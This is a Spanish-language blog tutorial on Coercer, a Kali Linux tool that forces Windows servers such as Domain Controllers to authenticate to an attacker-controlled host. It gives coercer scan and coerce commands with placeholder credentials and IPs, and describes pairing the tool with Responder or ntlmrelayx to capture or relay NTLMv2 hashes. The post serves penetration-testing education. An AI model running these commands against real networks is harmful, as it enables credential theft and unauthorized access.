Hacking Active Directory kali linux coercer

 

 https://www.onlinetis.com

Hacking Active Directory kali linux coercer

Coercer es una herramienta de seguridad escrita en Python que se utiliza principalmente en entornos de Active Directory (Windows). Su función principal es automatizar el proceso de forzar (o "coaccionar") a una máquina remota de Windows para que se autentique contra un servidor controlado por el atacante.

Esto es extremadamente útil para realizar ataques de SMB Relay o para obtener hashes de contraseñas (Net-NTLM) que luego pueden ser crackeados.


¿Para qué sirve Coercer?

En una red Windows, existen varios protocolos (como MS-RPRN o MS-EFSR) que permiten que un servidor le pida a otro que realice una acción. Coercer explota estas funciones legítimas para obligar a un servidor (por ejemplo, un Controlador de Dominio) a que intente conectarse a nuestra máquina de Kali Linux.

Características principales:

  • Multitarea: Escanea y explota múltiples métodos de coerción simultáneamente.

  • Fácil de usar: Una interfaz de línea de comandos intuitiva.

  • Compatible con Impacket: Utiliza las librerías estándar de seguridad para Windows en Linux.


Instalación en Kali Linux

La forma más sencilla de instalarlo es a través de pip (el gestor de paquetes de Python):

  1. Actualiza tu sistema:

    Bash
    sudo apt update
    
  2. Instala la herramienta:

    Bash
    pip install coercer
    

    Nota: Si prefieres el código fuente, también puedes clonar su repositorio oficial desde GitHub.


Modos de Uso Comunes

Coercer se divide principalmente en tres comandos: scan, coerce y fuzz.

1. Escaneo (Scan)

Sirve para verificar qué métodos de coerción son vulnerables en el objetivo sin llegar a ejecutarlos.

Bash
coercer scan -u "usuario" -p "password" -d "dominio.local" -t 192.168.1.10

2. Coerción (Coerce)

Este comando intenta forzar la autenticación hacia tu IP (donde normalmente tendrías un programa como Responder o ntlmrelayx escuchando).

Bash
coercer coerce -u "usuario" -p "password" -d "dominio.local" -t 192.168.1.10 -l 192.168.1.5
  • -t: IP de la víctima.

  • -l: Tu dirección IP (Kali Linux).

3. Fuzzing

Se usa para probar métodos desconocidos o variaciones en los protocolos para encontrar nuevas formas de forzar la autenticación.


Flujo de un Ataque Típico

  1. Preparación: El atacante inicia Responder en Kali Linux para capturar hashes.

  2. Ejecución: El atacante usa Coercer contra el Controlador de Dominio.

  3. Respuesta: El Controlador de Dominio intenta autenticarse contra la IP del atacante.

  4. Resultado: El atacante recibe el hash NTLMv2 o lo reenvía para ganar acceso a otra máquina.


Advertencia de seguridad: Utiliza esta herramienta únicamente en entornos controlados o bajo auditorías de seguridad autorizadas (Pentesting). El uso no autorizado en redes ajenas es ilegal.

 

Entradas populares de este blog

Hacking y ciberseguridad en kali linux con Fping

Hacking y ciberseguridad en kali linux con atk6-thcping6

Como utilizar Fierce en kali linux